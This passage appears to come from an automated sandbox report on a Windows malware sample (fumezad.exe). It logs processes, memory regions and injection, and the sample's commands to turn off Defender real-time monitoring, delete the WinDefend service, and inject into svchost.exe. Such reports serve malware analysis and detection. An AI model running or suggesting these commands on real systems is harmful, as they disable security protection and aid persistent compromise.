| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:42:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 182911 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #19: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Self Terminated |
| Monitor Duration | 00:00:26 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x318 |
| Parent PID | 0x844 (c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
6A4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0010ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00110000 | 0x00176fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00687fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00810fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x01c1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c20000 | 0x01c20000 | 0x01f62fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f70000 | 0x0223efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a550000 | 0x4a59bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x75280000 | 0x75286fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xb50, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a550000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76540000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7656a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76573b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76554a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7656a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:42:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 182957 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #20: svchost.exe
323
0
| Information | Value |
|---|---|
| ID | #20 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:20, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x714 |
| Parent PID | 0x844 (c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A08
0x
224
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rwx |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rwx |
|
|
|
- |
| imm32.dll | 0x000f0000 | 0x00118fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x00130000 | 0x001acfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00130fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00141fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00697fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x00820fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x01c2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c30000 | 0x01c30000 | 0x01d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e80000 | 0x01e80000 | 0x01efffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01f00000 | 0x021cefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000010000000 | 0x10000000 | 0x1001ffff | Private Memory | rwx |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fffb000 | 0x7fffb000 | 0x7fffbfff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0xffaa0000 | 0xffaaafff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x7fef61c0000 | 0x7fef6223fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7fef6230000 | 0x7fef62a0fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7fefaff0000 | 0x7fefaffafff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7fefb000000 | 0x7fefb026fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x7fefb290000 | 0x7fefb3b6fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefc8d0000 | 0x7fefc8edfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7fefcf90000 | 0x7fefcfb1fff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x7fefcfc0000 | 0x7fefd00dfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefd3f0000 | 0x7fefd414fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefd420000 | 0x7fefd42efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefd530000 | 0x7fefd53efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7fefd5d0000 | 0x7fefd5defff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd6e0000 | 0x7fefd74afff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7fefd750000 | 0x7fefd8b6fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7fefd900000 | 0x7fefd94cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefd970000 | 0x7fefda78fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7fefda80000 | 0x7fefdbacfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdce0000 | 0x7fefdcedfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7fefdcf0000 | 0x7fefdd60fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdd70000 | 0x7fefde38fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7fefde40000 | 0x7fefde47fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefde50000 | 0x7fefebd7fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefebe0000 | 0x7fefec0dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7fefed90000 | 0x7fefee6afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7fefee70000 | 0x7feff072fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff2e0000 | 0x7feff37efff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feff380000 | 0x7feff456fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7feff540000 | 0x7feff5a6fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff5b0000 | 0x7feff648fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff830000 | 0x7feff84efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feff900000 | 0x7feff900fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0x50000, size = 544 |
|
1 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0x60000, size = 72 |
|
2 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0xffaa246c, size = 22 |
|
1 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0x10000000, size = 1024 |
|
1 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0x10001000, size = 104448 |
|
2 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0x1001b000, size = 9216 |
|
2 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0x1001e000, size = 512 |
|
2 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0x1001f000, size = 512 |
|
2 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0x7fffffde010, size = 8 |
|
1 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0x412700, size = 8 |
|
1 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0x20000, size = 16 |
|
1 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0x20010, size = 110 |
|
1 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0x412718, size = 16 |
|
1 | |
| Modify Memory | #16: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x854 | address = 0xe0000, size = 16 |
|
1 |
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 |
Module (15)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x0 |
|
1 | |
| Load | USERENV.dll | base_address = 0x0 |
|
1 | |
| Load | IPHLPAPI.DLL | base_address = 0x0 |
|
1 | |
| Load | SHELL32.dll | base_address = 0x0 |
|
1 | |
| Load | ole32.dll | base_address = 0x0 |
|
1 | |
| Load | bcrypt.dll | base_address = 0x0 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x0 |
|
1 | |
| Load | WINHTTP.dll | base_address = 0x0 |
|
1 | |
| Load | ncrypt.dll | base_address = 0x0 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x0 |
|
1 | |
| Load | CRYPT32.dll | base_address = 0x0 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x0 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x0 |
|
1 | |
| Get Filename | OLEAUT32.dll | process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe, size = 512 |
|
1 | |
| Get Filename | OLEAUT32.dll | process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe, size = 260 |
|
1 |
System (305)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
302 | |
| Get Time | type = Local Time, time = 2019-02-06 16:42:32 (Local Time) |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\E0B7509842610 |
|
1 |
Process #21: sc.exe
9
0
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\windows\syswow64\sc.exe |
| Command Line | sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:09, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xac4 |
| Parent PID | 0x894 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AD4
0x
B78
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| sc.exe.mui | 0x000f0000 | 0x000fffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| sc.exe | 0x00da0000 | 0x00dabfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
